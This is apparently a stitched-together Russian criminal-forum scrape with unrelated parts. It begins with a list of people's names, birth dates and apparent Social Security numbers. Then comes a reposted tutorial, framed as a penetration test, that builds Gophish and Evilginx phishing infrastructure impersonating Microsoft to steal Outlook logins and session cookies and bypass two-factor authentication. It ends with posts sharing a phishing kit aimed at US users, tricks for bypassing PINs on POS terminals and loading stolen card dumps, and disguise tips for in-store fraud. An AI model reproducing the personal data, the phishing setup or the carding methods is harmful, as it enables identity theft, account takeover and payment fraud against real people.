BARNES MINDY 19710706 Female 528110370
ZIMMERMAN JENNIFER ELLEN 19710712 Female 528554927
BARBER MELANIE C 19710714 Female 528196959
BOUNDS STACI ANE 19710717 Female 528294594
SAWYER ANGELA L 19710719 Female 528949629
STERRETT KIMBERLY ANN 19710814 Female 528350900
ESTEBAN MARTIN MATEO 19710824 Male 528161728
CHRISTIANSON MELISSA ANN 19710827 Female 528155366
JENSEN KAYLINN 19710919 Female 528138019
GORNEY DUSTIN MICHAEL 19710925 Male 528637631
GAYER CHARLOTTE ANN 19710930 Female 528138556
WARREN BRANDON SHAYNE 19711002 Male 528210816
YATES YORK JAY 19711009 Male 528779617
SWASEY SCOTT PIERCE 19711016 Male 528679578
JAFFE BRYAN L 19711025 Male 528210587
DALTON JENNIFER MARY 19711026 Female 528694025
MORROW JEREMI CADE 19711104 Male 528730905
GILL TRACY 19711106 Female 528558482
UZELAC TAMARA 19711108 Female 528554969
HAYNIE MARLENE GAYLE 19711202 Female 528236500
TUMLINSON LEON SHANE 19711209 Male 528358010
LUCUS BRETT ALAN 19720113 Male 528619210
COX JOSEPHINE ARMISTEAD 19720121 Female 528235677
CHARLESWORTH DACIA 19720204 Female 528518813
BRONSON JUDD R 19720213 Male 528969961
JOHNSTON HOLLY THOMSON 19720227 Female 528295369
MERRILL DANIEL KENNETH 19720229 Male 528171760
POTTS LARRY M 19720308 Male 528437017
HILL SONYA M 19720311 Female 528313809
REECE TAIT T 19720319 Male 528793225
HAMILTON REBECCA L 19720321 Female 528599177
BERTCH WESLEY BAHE 19720329 Male 528028448
TURNER MALENA RUTH 19720403 Female 528154862
YOUNG TAMMY LARKIN 19720405 Female 528049858
LOTT JANAE P 19720412 Female 528299541
BYRD LUCILE 19720429 Female 528131996
WEIGHT JOSEPH W 19720507 Male 528499018
FORSBERG CHRISTOPHER T 19720513 Male 528137860
MUTZ LISA L 19720515 Female 528570362
TRAVIS TERRA R 19720525 Female 528375886
BRADFORD MICHAEL ADAM 19720606 Male 528437432
WHITE DERRICK 19720612 Male 528336900
WINTER LINDA SUE 19720618 Female 528496418
LAKE CARMEN B 19720705 Female 528133377
TRIEU THOMAS 19720710 Male 528319231
ELSWICK JOHN COLDEN 19720715 Male 528698346
ZITTING WILLIAM O 19720717 Male 528930865
HINOJOSA GRAVIEL 19720726 Male 528049180
CARTER JUSTIN BRIAN 19720802 Male 528451816
CLARK BOBBIE J 19720803 Female 528490878
WINCHESTER MARIE BEHUNIN 19720822 Female 528983751
LOTT DONOVAN JONES 19720826 Male 528214767
LAGUD JENNIFER LEE 19720908 Female 528047802
POLL STEVEN MARLOW 19720915 Male 528652284
BISHOP RICHELLE 19720920 Female 528770334
BALDWIN SIRRILDA G 19720922 Female 528438096
PRUENTE MICHELLE 19721007 Female 528298928
TOWNSEND KENNETH R 19721025 Male 528576634
BRADLEY JASON M 19721029 Male 528214799
BRADLEY JASON M 19721029 Male 528214799
SPERRY ALEN PAUL 19721106 Male 528595707
WOOLLEY FRANK CABOT 19721109 Male 528552777
RIOS ALBERTO 19721122 Male 528948153
ELMBORG CAREY S 19721128 Female 528431343
HUND KIMBERLY R 19721128 Female 528084339
BREWER DOUGLAS TY 19721208 Male 528776401
RILEY BRADLEY MARSHALL 19721217 Male 528116784
RILEY BRADLEY MARSHALL 19721217 Male 528116784
FORET CATHERINE DOLORES 19721220 Female 528061540
DUPAIX MONICA TAYLOR 19721222 Female 528699916
JONES CHRISTY N 19721222 Female 528069060
SCHEYTT JUSTIN RILL 19730107 Male 528559960
MCMAHAN DONNA DARLENE 19730116 Female 528060326
MARIN ELI 19730217 Male 528821902
NUGENT REBECCA THOMAS 19730218 Female 528631308
ABDULLA ALIA M 19730220 Female 528454271
EATON MICHAEL E 19730306 Male 528793623
EATON MICHAEL E 19730306 Male 528793623
EATON MICHAEL E 19730306 Male 528793623
FLORES ALFREDO H 19730312 Male 528748576
SMITH TONYA RENEE 19730314 Female 528191988
CAREY CARRI A 19730315 Female 528358635
AMADOR CHASE R 19730317 Male 528119376
GONZALES JERAMEY E 19730319 Male 528089395
COLIN-BOCANEGRA RAUL 19730321 Male 528673751
HAMILTON KELLI DAWN 19730323 Female 528612428
JAMES MICHAEL LEE 19730323 Male 528139882
PRUDDEN JOHN MILTON 19730325 Male 528430390
LEE CHRISTOPHER M 19730405 Male 528454734
VALLONE LATISHA M 19730405 Female 528495759
MCBRIDE DAVID S 19730407 Male 528115397
NORRELL MILES GRIFFIN 19730410 Male 528679535
SNIDER ANNA ALEXIA 19730411 Female 528492108
BARNEY WARREN B 19730413 Male 528830855
CHILTON DANIELLE CHRISTINA 19730420 Female 528679789
BRADEN RYAN P 19730422 Male 528558659
KNORPP KATHLEEN RENEE 19730425 Female 528049581
HINTON JULIE MARIE 19730427 Female 528254575
ZUNIGA PEDRO 19730428 Male 528103526
WEEKS RICHARD D 19730507 Male 528491351
WIERINGA LASHELLE ANN 19730513 Female 528085566
MARIN CAMILO LUNA 19730610 Male 528329437
MARIN CAMILO LUNA 19730610 Male 528329437
REYES ALVINO J 19730614 Male 528186428
BIRCH JOSHUA DAVID 19730701 Male 528914636
PADILLA ZENAIDA LUISA 19730706 Female 528558962
RUESCH CHRISTOPHER LYNN 19730717 Male 528315623
ALDRICH ANGELA 19730731 Female 528276085
MCHENRY ESTHER M 19730810 Female 528259272
MAGEE SEAN STEVEN 19730823 Male 528255900
HAAS EMILY 19730828 Female 528913425
ERICKSON KAYSEE V 19730901 Female 528610233
CULLINANE SAMANTHA SNYDER 19730910 Female 528064893
CHRISTENSEN KEN D 19730918 Male 528796314
WILLIAMS DELTA DAWN 19730925 Female 528132338
TIMPERLEY TRINA L 19730926 Female 528593302
[/ ISPOILER][/ CLIKE][/CLIKE]
В этой статье я объясню, как построить инфраструктуру для симуляции фишинговой атаки в рамках тестирования организации. Мы создадим с нуля почтовый сервер, установим и настроим обратный прокси Evilginx, а затем внедрим его в фишинговый фреймворк Gophish. В конце я покажу на практике процесс проведения фишинговой атаки с перехватом логина, пароля и сессионных cookie, c последующим обходом двухфакторной аутентификации.
Два фреймворка, которые мы будем использовать для проведения фишинговой кампании, называются Evilginx и Gophish. Это два самостоятельных инструмента, которые выполняют разные задачи.
Gophish — это программа с открытым кодом, созданная Джорданом Райтом. Gophish позволяет проводить автоматизированные фишинговые рассылки и таким образом имитировать действия злоумышленника.
Evilginx — это обратный прокси‑сервер, который проксирует соединение между пользователем и целевым веб‑ресурсом, позволяя перехватить логин, пароль и ключи сеанса. С помощью этого фреймворка можно обойти двухфакторную аутентификацию. Автор Evilginx — Куба Грецки.
Есть две версии интеграции этих двух инструментов. Первая — неофициальная, ее разработал Дилан Эванс, он же fin3ss3g0d. Она включает в себя более расширенный набор возможностей вроде SMS-рассылок и генерации QR-кодов, а также некоторые другие отличия от официальной версии.
Официальную интеграцию разработал автор Evilginx Куба Грецки, и появилась она относительно недавно — в апреле 2024 года. На данный момент в ней меньше функций, чем в версии fin3ss3g0d, но инструмент постоянно обновляется, и, скорее всего, все недостающее добавят. В статье я буду использовать именно эту версию интеграции.
Для начала необходимо арендовать VPS/VDS и доменное имя. Нам хватит следующей
конфигурации: 1 Гбайт ОЗУ, 20 Гбайт SSD и один процессор. В качестве ОС —
Ubuntu 20.04.
Получаем креды от сервера, подключаемся к машине по SSH и проводим базовую
настройку: создаем нового пользователя и добавляем его в группу sudo, создаем
ключи SSH, отключаем аутентификацию по паролю, настраиваем порты, правила
файрвола и так далее.
Разобравшись с сервером, приступаем к созданию и настройке домена. Для этого выбираем любой сервис, предоставляющий услуги аренды. Один из ключевых компонентов фишинговой атаки — это доменное имя, которое введет пользователя в заблуждение. Этот процесс называется тайпсквоттинг, и вариантов здесь может быть много.
Я решил создать неприметный домен webaccount.site, чтобы потом добавить к нему поддомены, содержащие названия известных организаций, так как поддомены необязательно должны быть уникальными. Например, если добавим поддомен microsoft, у нас получится microsoft.webaccount.site.
Теперь приступим к настройке DNS. Первым делом нужно установить основную запись типа А, которая связывает доменное имя с IP-адресом сервера. Для этого редактируем ресурсные записи в разделе управления зоной DNS у регистратора.
В дальнейшем при создании фишинговых адресов будет использоваться множество
поддоменов и для каждого такого поддомена потребуется отдельная запись типа A,
однако можно использовать и запись типа CNAME, передав ей в качестве аргумента
регулярное выражение «звездочка».
Этот тип записи сопоставит псевдоним (поддомен) с каноническим именем домена
(webaccount.site) в момент генерации фишингового адреса и получения TLS/SSL-
сертификата в Evilginx.
Подождем, пока DNS-записи распространятся (это может занять некоторое время, от 15 минут до нескольких часов), и проверим работоспособность сервера. Для этого просто обращаемся к домену через браузер.
Домен успешно привязался к серверу. После аренды домена желательно подождать
хотя бы неделю: чем домен старше, тем меньше вероятность, что он окажется в
черных списках. Во время моих первых попыток я регистрировал домен и сразу же
использовал его в имитации фишинговой атаки, из‑за чего его отстреливали в
течение суток. Раз с доменом разобрались, приступим к установке почтового
сервера.
SMTP-сервер — один из ключевых компонентов нашей будущей инфраструктуры. Его задача — выступать в роли ретранслятора. Настройка почтового сервера несложная, но требует множества последовательных действий.
Первым делом необходимо установить две записи. Одна — типа А с именем mail,
указывающая на IP-адрес сервера.
Вторая запись — типа MX, которая указывает на сервер, обрабатывающий
электронную почту.
Теперь можно приступить к установке и настройке Postfix. Подключаемся к своему
VPS/VDS по SSH и запускаем установку:
Code:Copy to clipboard
sudo apt install postfix
При настройке в первом шаге выбираем пункт Internet Site.
Вводим доменное имя, которое будет определяться при отправке почты.
Указываем почтовый адрес администратора домена. Можно оставить пустым (что не
рекомендуется), тогда почта, предназначенная для администратора, будет
отправляться в /var/mail/nobody
.
Дальше прописываем адреса вот в таком формате:
Code:Copy to clipboard
<hostname>, <domain>, localhost.com, localhost
Отказываемся от принудительного выполнения синхронизации обновлений.
Поле с локальной сетью не трогаем и оставляем по умолчанию.
Размер почтового ящика оставляем со значением 0, в этом случае он будет определяться общим дисковым пространством.
Символ, который будет использоваться для определения расширения локального адреса, — ставим плюсик.
И в последней настройке выбираем используемые протоколы — all.
После настройки установку Postfix можно считать завершенной. Проверяем при
помощи утилиты netcat, запустился ли почтовый сервер. Достаточно постучаться
на 25-й порт нашего хоста (порт SMTP по умолчанию).
Почтовый сервер запущен, но одной установки мало, необходимо также настроить
ресурсные записи, чтобы почта доходила до конечной точки. Если пропустить этот
важный этап, почта не то что будет попадать в спам, она в принципе не будет
рассматриваться почтовыми серверами. Для успешной доставки сообщений
необходимо настроить ресурсные DNS-записи типа TXT — SPF, DKIM, DMARC.
Начнем с записи SPF (Sender Policy Framework). Это текстовая запись, которая описывает то, какие хосты имеют право отправлять почту от имени домена, то есть это список доверенных серверов. По сути, SPF — это механизм, проверяющий, авторизован ли хост, отправляющий электронное письмо от определенного доменного имени.
Чтобы такое правило работало, создаем запись TXT в панели управления доменом.
Эта запись определяет, что электронную почту от имени домена могут отправлять
серверы, указанные в записях MX и A домена, а также имеющие IP-адреса из
диапазона 94.142.141.0/24. Почта от других хостов будет помечена как
подозрительная.
Ты можешь воспользоваться веб‑инструментом SPF Wizard, чтобы создать свои правила SPF.
Второй записью настроим DKIM (DomainKeys Identified Mail). Это механизм проверки электронной почты, задача которого — предотвращать подделку сообщений. Для этого применяется асимметричное шифрование: каждое сообщение подписывается закрытым ключом.
DKIM использует пары ключей: закрытый, к которому имеет доступ только почтовый сервер, и открытый, который прописывается в текстовой DNS-записи, а затем используется получателем для проверки легитимности сообщения.
Настройка этой записи потребует множество шагов, будь внимателен при их выполнении — сделать что‑то не так довольно легко. Полное руководство по настройке DKIM есть на [DigitalOcean](https://www.digitalocean.com/community/tutorials/how-to- install-and-configure-dkim-with-postfix-on-debian-wheezy), я не буду полностью переписывать его, а только опишу ключевые моменты.
Первым делом устанавливаем утилиту OpenDKIM:
Code:Copy to clipboard
sudo apt update
sudo apt install opendkim opendkim-tools
И редактируем файл /etc/opendkim.conf
. Добавим следующие строки (номер порта
Socket выбираем любой, который не занят):
Code:Copy to clipboard
AutoRestart Yes
AutoRestartRate 10/1h
UMask 002
Syslog yes
SyslogSuccess Yes
LogWhy Yes
Canonicalization relaxed/simple
ExternalIgnoreList refile:/etc/opendkim/TrustedHosts
InternalHosts refile:/etc/opendkim/TrustedHosts
KeyTable refile:/etc/opendkim/KeyTable
SigningTable refile:/etc/opendkim/SigningTable
Mode sv
PidFile /var/run/opendkim/opendkim.pid
SignatureAlgorithm rsa-sha256
UserID opendkim:opendkim
Socket inet:12712@localhost
Подключаем расширение Milter к Postfix. Сначала открываем файл
/etc/default/opendkim
и меняем номер порта вот в этой строке:
Code:Copy to clipboard
SOCKET="inet:12301@localhost"
Новый номер выбираем тот, что указали ранее в opendkim.conf
:
Code:Copy to clipboard
SOCKET="inet:12712@localhost"
Затем настраиваем Postfix на использование Milter. Для этого открываем файл
/etc/postfix/main.cf
и убеждаемся, что присутствуют эти две строки и они не
закомментированы:
Code:Copy to clipboard
milter_protocol = 2
milter_default_action = accept
Редактируем следующие строки, меняя номер порта на тот, что определили ранее.
Если таких параметров в файле нет, то прописываем их:
Code:Copy to clipboard
smtpd_milters = inet:localhost:12712
non_smtpd_milters = inet:localhost:12712
Создаем каталоги для взаимодействия с ключами:
Code:Copy to clipboard
sudo mkdir /etc/opendkim
sudo mkdir /etc/opendkim/keys
Указываем доверенные хосты в файле /etc/opendkim/TrustedHosts
.
Создаем таблицу ключей, для этого прописываем в файл /etc/opendkim/KeyTable
такую строку:
Code:Copy to clipboard
mail._domainkey.webaccount.site webaccount.site:mail:/etc/opendkim/keys/webaccount.site/mail.private
Создаем таблицу подписей, прописав в файл /etc/opendkim/SigningTable эту строку:
Code:Copy to clipboard
*@webaccount.site mail._domainkey.webaccount.site
Теперь приступим к созданию пары открытого и закрытого ключей. Переходим в
каталог /etc/opendkim/keys
и создаем директорию для домена, в которой будут
храниться ключи.
Генерируем ключи следующей командой:
Code:Copy to clipboard
sudo opendkim-genkey -s mail -d webaccount.site
После чего меняем владельца файла с закрытым ключом на учетную запись opendkim.
Осталось добавить содержимое файла mail.txt в текстовую запись DNS в панели управления доменом. Выводим содержимое файла в консоль, копируем всю строку, которая находится в скобках, и приводим к нужному формату.
В итоге у меня получилось отформатированное значение, которое нужно добавить в
DNS-запись типа TXT с ключом mail._domainkey
.
Политика DMARC (Domain-based Message Authentication, Reporting & Conformance) нужна для предотвращения спуфинга электронной почты. Этот протокол, по сути, дополнение к SPF и DKIM. Он определяет правила обработки электронных сообщений, которые поступили с неавторизованных доменов.
Настройка крайне проста, особенно на фоне DKIM. Достаточно создать TXT-запись
вроде той, что на скриншоте.
Когда все настроено, время проверить работоспособность сервера SMTP. Для этого можно либо отправить сообщение себе на почту с любого сервиса, либо же воспользоваться mail-тестером. Открываем сайт по ссылке, копируем указанный там почтовый адрес и жмем большую кнопку «Проверить». Теперь мы можем отправить сообщение на выданный нам адрес. Это делается вот такой командой:
Code:Copy to clipboard
echo "Test" | mail -s "Test" [почтовый адрес]
Как видим, почтовый сервер настроен и корректно работает (половину балла мне сняли, потому что домен есть в одном из нескольких черных списков, но это совсем не критично). Если ты сделал ошибки в настройке, в этом отчете они будут указаны.
Прежде чем поднимать Evilginx и Gophish, нужно установить в систему язык Go, так как оба этих инструмента работают на нем. Отправляемся на сайт разработчика и открываем страницу установки, скачиваем deb-пакет командой wget и следуем инструкции.
Приступим к установке Gophish. Нам нужно скачать версию с интеграцией в
Evilginx из репозитория, тут есть два
варианта установки. Первый — скачиваем командой wget архив с релизом для своей
ОС со страницы releases,
после чего просто разархивируем файл и делаем бинарник Gophish исполняемым
командой chmod.
Второй вариант — сборка из исходного кода. Для этого копируем репозиторий и запускаем установку:
Code:Copy to clipboard
sudo git clone https://github.com/kgretzky/gophish/
go build
В результате у нас будет версия Gophish, модифицированная для работы с Evilginx.
Теперь можно приступить к настройке и запуску Gophish. Первым делом
редактируем файл config.json. В нем нужно изменить параметр
admin_server.listen_url. По умолчанию там указан локальный IP 127.0.0.1. Чтобы
Gophish работал не только локально и к нему возможно было подключиться через
интернет, нужно изменить этот IP на 0.0.0.0:3333. Номер порта, кстати, можно
выставить любой незанятый в системе.
После настройки запускаем исполняемый файл Gophish и сразу ищем в логах логин и пароль по умолчанию для доступа к панели управления.
Теперь переходим в браузер и обращаемся к панели Gophish по адресу своего
VPS/VDS с указанным ранее портом.
Вводим креды, которые нашли в логах, после чего у нас открывается форма для
изменения пароля по умолчанию. Меняем пароль, снова вводим креды,
аутентифицируемся и попадаем в нашу учетную запись Gophish.
Чтобы оптимизировать запуск и дальнейшие фишинговые кампании, нужно настроить
Gophish как демон, то есть создать сервис, который будет запускать Gophish в
фоновом режиме или останавливать одной командой. В каталоге /etc/init.d
находятся сценарии оболочки, которые запускаются системой инициализации
SysVinit, поэтому создаем в этом каталоге файл Gophish и добавляем следующий
код, указав в параметре appDirectory абсолютный путь к Gophish:
Code:Copy to clipboard
processName=Gophish
process=gophish
appDirectory=/home/zxc/gophish
logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error
start() {
echo 'Starting '${processName}'...'
cd ${appDirectory}
nohup ./$process >>$logfile 2>>$errfile &
sleep 1
}
stop() {
echo 'Stopping '${processName}'...'
pid=$(/bin/pidof ${process})
kill ${pid}
sleep 1
}
status() {
pid=$(/bin/pidof ${process})
if [["$pid" != ""| "$pid" != "" ]]; then
echo ${processName}' is running...'
else
echo ${processName}' is not running...'
fi
}
case $1 in
start|stop|status) "$1" ;;
esac
Сохраняем файл и прописываем команды для запуска демона и проверки статуса его работы.
Сервис запускается и работает корректно.
Копируем официальный репозиторий Evilginx с GitHub:
Code:Copy to clipboard
sudo git clone https://github.com/kgretzky/evilginx2 && cd evilginx2
Evilginx тоже написан на Go, который у нас уже установлен. Поэтому просто
выполняем make. Скрипт соберет весь проект и создаст исполняемый файл evilginx
в директории build.
Чтобы постоянно не прописывать бесконечные пути, лучше собрать все необходимое
в отдельном каталоге. Создаем директорию evilginx в домашнем каталоге и
копируем исполняемый файл evilginx вместе с директориями phishlets и
redirectors в ~/evilginx:
Code:Copy to clipboard
sudo mkdir ~/evilginx
sudo cp ./build/evilginx ~/evilginx
sudo cp -r ./phishlets/
sudo cp -r ./redirectors
Когда все готово, приступаем к настройке. Запускаем Evilginx:
Code:Copy to clipboard
sudo ./evilginx -p phishlets/
Нам необходимо определить IP-адрес и домен, а также интегрировать Gophish. В
консоли Evilginx прописываем эти команды:
Code:Copy to clipboard
config domain [ваш домен]
config ipv4 [IP вашего VPS/VDS]
config Gophish admin_url [URL, на котором поднят gophish]
config Gophish api_key [ключ API gophish]
config Gophish insecure true
Ключ API Gophish можно найти в панели управления Gophish, перейдя на вкладку Account Settings.
Теперь выполняем команду config gophish test для тестирования соединения Evilginx и Gophish.
Сообщение гласит о том, что соединение успешно.
На этом этапе мы построили основную часть инфраструктуры. Теперь можно начать подготовку к проведению фишинговой кампании.
Отправляемся в панель управления Gophish и начинаем настраивать компоненты для рассылки фишинговых сообщений.
Первый компонент — это группы пользователей, которым будут рассылаться письма. Другими словами, это жертвы, точнее, подопытные в нашем тесте.
Предположим, в результате разведки мы получили имена и почтовые адреса работников компании. Все эти данные добавляем в соответствующие поля и нажимаем кнопку Add для каждого пользователя. Либо можешь сразу загрузить файл CSV, содержащий все эти данные. Когда вся инфа добавлена, нажимаем кнопку Save changes.
Следующее, что стоит настроить, — это шаблон электронного письма. Правильно
написанное письмо, не вызывающее подозрений, а вызывающее только желание
поскорее нажать на ссылку и выполнить все инструкции, — это ключевой компонент
успешной фишинговой атаки. Тут уже все зависит от навыков социальной инженерии
атакующего. Я создам абсолютно условное фишинговое письмо и не буду
расписывать методы социальной инженерии, это отдельная тема.
Чтобы создать фишинговое письмо, я взял HTML-код настоящего сообщения от Microsoft, которое приходило мне на почту, а затем немного изменил его содержание.
В разделе Email Templates вставляем HTML-код и редактируем сообщение на вкладке HTML.
Не забываем поставить галочку Add Tracking Image, которая добавит трекер для
отслеживания статистики по открытым письмам. Трекер выглядит как переменная
{{.Tracker}} в коде сообщения. Кстати, об этих переменных стоит поговорить
чуть подробнее.
При помощи переменных ты можешь менять содержимое сообщения в зависимости от пользователя, которому оно отправлено. Всего переменных десять, нам в первую очередь пригодятся {{.FirstName}}, {{.LastName}} и {{.Email}}, которые подставляют имя, фамилию и адрес почты из настроек групп пользователей. Благодаря им письма не придется персонализировать вручную.
Переменная {{.URL}} подставляет сгенерированную фишинговую ссылку в сообщение. Например, я подставил ссылку через переменную в кнопку «Подтвердить». Про остальные переменные можно прочитать в документации.
Также прописываем заголовок и отправителя сообщения, который будет указан, когда письмо дойдет. Я просто скопировал отправителя из официального сообщения Microsoft, но изменил домен на свой, добавив слово microsoft поддоменом третьего уровня. В итоге мое сообщение будет отправлено от имени «Служба технической поддержки учетных записей Microsoft noreply@microsoft.webaccount.site».
Ниже — фишинговое письмо, которое у меня получилось. Gophish будет подставлять почту пользователя вместо переменной {{.Email}}.
Письмо, как видишь, условное и на практике потребовало бы доработки.
Третий компонент — это профиль отправки, тот, ради которого мы настраивали почтовый сервер и записи DNS. Здесь мы указываем SMTP-ретранслятор, с помощью которого будет происходить рассылка. Открываем вкладку Sending Profile, пишем название профиля, указываем почту отправителя и, наконец, пишем адрес и порт SMTP-ретранслятора. Так как он находится на том же хосте, где мы запустили Gophish, вводим localhost:25 (порт SMTP указывать обязательно). Также не забудь поставить галочку Ignore Certificate Errors.
В этом же окне есть кнопка для отправки тестового письма, обязательно проверяй
работоспособность SMTP-ретранслятора перед проведением кампании.
На этом настройка компонентов Gophish закончена, поэтому сворачиваем браузер и
приступаем к созданию фишинговых ресурсов Evilginx.
Первое, с чем нужно ознакомиться, — фишлеты Evilginx. Это самая основа, с их помощью и обходится 2FA. Фишлеты — это конфигурационные файлы YAML, которые определяют, какие домены и поддомены проксировать, подменять, какие аутентификационные данные перехватывать и что с ними делать. В общем, правильно настроенный фишлет определяет технический успех фишинговой атаки. Для каждого веб‑ресурса пишется свой фишлет, однако каждый фишлет — это шаблон.
Я не буду подробно описывать, как работают фишлеты или как их создавать, об этом поговорим в другой раз. Пока же можешь обратиться к официальной документации. Самое главное — не покупай фишлеты в «Телеграме», на форумах и тому подобных ресурсах!
Целевым веб‑ресурсом я выбрал Outlook, фишлет к которому уже написан и опубликован в репозитории на GitHub. Скачиваем его и перемещаем в директорию ~/evilginx/phishlets.
Запускаем Evilginx с фишлетом:
Code:Copy to clipboard
sudo ./evilginx -p phishlets/
И начинаем настраивать фишинговые компоненты. Первым делом задаем URL, который пользователь будет видеть во время проксирования трафика. Нужно придумать такое имя хоста, которое не будет вызывать подозрений. Я добавил два поддомена к своему имени хоста:
Code:Copy to clipboard
microsoft.outlook.webaccount.site
Так как поддомены необязательно должны быть уникальными, мы используем это свойство для добавления известных и авторитетных имен. Указываем имя хоста и активируем фишлет:
Code:Copy to clipboard
phishlets hostname Outlook microsoft.outlook.webaccount.site
phishlets enable Outlook
В этот момент Evilginx будет автоматически получать сертификаты SSL/TLS для всех доменов и поддоменов, которые используются в атаке, чтобы фишинговый URL, да и соединение в принципе работали по протоколу HTTPS.
Через 30 секунд успешно получаем все сертификаты SSL/TLS и двигаемся дальше.
Следующие в очереди приманки, они же Lures в официальной документации. По факту это просто сгенерированные фишинговые ссылки, которые мы отправляем. Настройка очень проста, сначала создаем приманку для фишлета Outlook:
Code:Copy to clipboard
lures create Outlook
Консоль выведет числовой идентификатор приманки, он нам еще пригодится. Приводим ссылку к такому виду:
Code:Copy to clipboard
https://microsoft.outlook.webaccount.site/user/account
Копируем сгенерированную фишинговую ссылку и переходим в Gophish.
Теперь откроем вкладку Campaigns и соберем все воедино. Пишем название кампании и выбираем по заданным именам: шаблон электронного письма, профиль отправки и группу пользователей.
Выбрав все компоненты, вставляем сгенерированную ранее ссылку в поле Evilginx
Lure URL и нажимаем на кнопку Launch Campaign.
После запуска кампании мы видим статистику, которая ведется в режиме реального
времени. Пока что четыре сообщения отправлены, но никем не прочитаны.
Проверяем почту и видим, что фишинговое сообщение дошло.
Нажав на профиль отправителя, замечаем, что тут указано всё то, что мы прописали в шаблоне электронного сообщения Gophish. Невнимательный пользователь, скорее всего, даже не будет проверять, но если кто‑то и проверит, то есть вероятность, что слово microsoft в названии домена убаюкает подозрительность.
Сразу же проверим, работает ли трекер, отслеживающий открытие сообщений.
Видим, что просмотр сообщения регистрируется, статус пользователя в столбце
Status меняется, к тому же обновляются диаграммы.
Вернемся к нашему фишинговому письму. Когда мы наводим курсор на кнопку
«Подтвердить», в нижнем углу браузера видим ссылку, по которой мы перейдем
после нажатия.
Имитируя действия потенциальной жертвы, переходим по фишинговой ссылке и ждем,
пока браузер проверит, безопасная ли это страница.
Нас перенаправляет на настоящую страницу авторизации Microsoft, но при этом
весь трафик проходит через наш обратный прокси‑сервер вот с таким доменом:
Code:Copy to clipboard
live.microsoft.outlook.webaccount.site
Вводим логин и пароль, после чего получаем запрос на подтверждение второго
фактора аутентификации в приложении Microsoft Authenticator.
Продолжая имитацию действий потенциальной жертвы, подтверждаем вход в
мобильном приложении и ждем, пока пройдет аутентификация.
И в итоге входим в учетную запись. При этом соединение все еще происходит через прокси‑сервер потенциального злоумышленника.
Открываем консоль Evilginx и видим логи успешного перехвата.
Вводим команду
Code:Copy to clipboard
sessions [ID сессии]
И получаем информацию, которая содержит время перехвата, IP-адрес жертвы, User agent, логин, пароль и cookie сеанса.
Логин и пароль — это, конечно, важная и критическая информация, но смысл этой
атаки — перехватить токен сеанса в виде файла cookie. Чтобы проэксплуатировать
перехват сессии, копируем всю строку cookies и открываем браузер.
Устанавливаем расширение Cookie-Editor, которое позволяет манипулировать куками, и открываем легитимную страницу входа в Microsoft Outlook. Перед тем как подменять cookie, удаляем те, что назначены браузером. Для этого просто нажимаем кнопку Delete All.
Затем нажимаем кнопку Import и вставляем сплошную строку из перехваченной
сессии в Evilginx. Теперь еще раз нажимаем на Import и обновляем страницу.
После обновления страницы браузер обрабатывает куки, которые мы внедрили, и
открывает учетную запись пользователя, у которого был перехвачен сессионный
токен.
Раздобыв учетку Microsoft в любом сервисе, мы также получаем доступ к основным
настройкам и ко всем сервисам этой учетной записи. Это может быть довольно
критично, особенно учитывая, сколько конфиденциальной информации может
храниться в OneDrive или в документах Word.
Задача Gophish заключается не только в автоматизации рассылок, но и в ведении статистики, например для подготовки отчетов о результатах атаки, которые пригодятся пентестерам. После завершения кампании мы получаем статистику о том, кто открыл письмо, кто перешел по ссылке, кто попался на фишинг и ввел креды или же что‑то заподозрил и пожаловался на письмо.
На этом наша фишинговая кампания завершена. Как видим, для проведения этой
атаки нам потребовались только базовые технические знания и навыки, а также
небольшое финансовое вложение в аренду сервера и домена.
Есть еще огромное множество методов, которые сделают атаку более изощренной, но моей целью было показать базовый вариант, который тем не менее вполне может применяться на практике.
Автор @kotoamatsukami Наделяев Георгий
Источник xakep.ru
You must have at least 5 message(s) to view the content.
Сливаю свой самописный фиш по юсе.
Изначально это был заказ, но заказчик разрешил мне это выложить на
общее.
Из функционала:
Настройка:
После этого у вас все должно работать, таблицы создаются сами после добавления первой машины в базу, фотки берете из интернета
БОНУС кстати внутри есть отредаченные мною фотки машин с убранными лого других автосервисов
You must spend at least 30 day(s) on the forum to view the content.
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/rfYwO)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
фишка с ПОСТ терминалов, (но действует не на всех ПОСТ терминалов), читал где
то, то что если имеется Банковская карта но при этом не знаешь пин-код, то
оплатить можно с ней, даже не зная пин код. Для этого, я пошел в мак дональс,
что бы проверить это, (со своей карточкой), вставил карточку набрал пин код
6666 (без разнице какой пин будете вводить), после чего нажал на красную
кнопочку, (не зеленую как всегда мы привыкли), и смотрю платеж успешно
прошел!, Я сначала не понял... Ну пошел в торговой центр, купил вещи, и опять
вставил карточку, но там уже когда ввел 6666, у меня не получилось провести
операцию. Вернулся в мак дак, и снова купил кофе, оплатив при этом опять
карточкой, воспользовался той же схемой, и прошел пин код Успешно!,
Грубо говоря, я почитав на американском сайте (точно не помню на каком),
оказалось что есть ПОСТ терминалы на которых прошивка старая, и это лазейка
работает. Если у кого то в городе есть магазины где имеются ПОСТ терминалы,
советую проверить ) Я когда офиком работал у нас одна официантка , так и
оплачивала заказы, что бы лишний раз к клиенту не бегать с терминалом , она
тупо проводила без пин кода.
В точках питания,клубах и т.д. такое канает,но никак не зависит от модели пос терминала
Кстате, есть еще фича одна, только не знаю на каких точно моделях/прошивок используется данная уязвимость, но не давно узнал вот такую инфу: Вставить карту в пост терминал, ввести любое 4х значимое число, и нажать подряд 3-4 раза (зеленую кнопку)....
С помощью этой информации вполне можно вещевухой налить дампы по track2 без пина)
Есть еще такая штука coincard - записывает дампы , до 99 шт в память - и грубо 1 картонка=99 карт)))с пинами есесно)
Действительно так и есть, на старых терминал это работает, например на
verifone vx520, так же как и функция '' ручного ввода '' , когда вводишь номер
карты/Дату/Свв ,указываешь сумму и лаве падает с карты на банковский счет к
которому привязан POS терминал. По данной схеме работают до сих пор)
В посах как в Ашане есть обход три раза вставляете обратной стороной не чипом
а пластиком, после третьей ошибки картинка на дисплее меняется на провести
магнитной ленто проводите и не смотря на то что карта с чипом покупка пройдёт.
Методы анонимности думаю знает, маска, очки одежда с помойки одноразовая,
никаких телефонов. Заливать дампы можно на любые старые как бонусные так и
банковские карты где есть магнитная полоса, хоть от спортмастера то есть они
как в качестве балванок идут.
То одеваем маску очки, шмотьё с помойки и идём на дело в Ашан ?) потому что
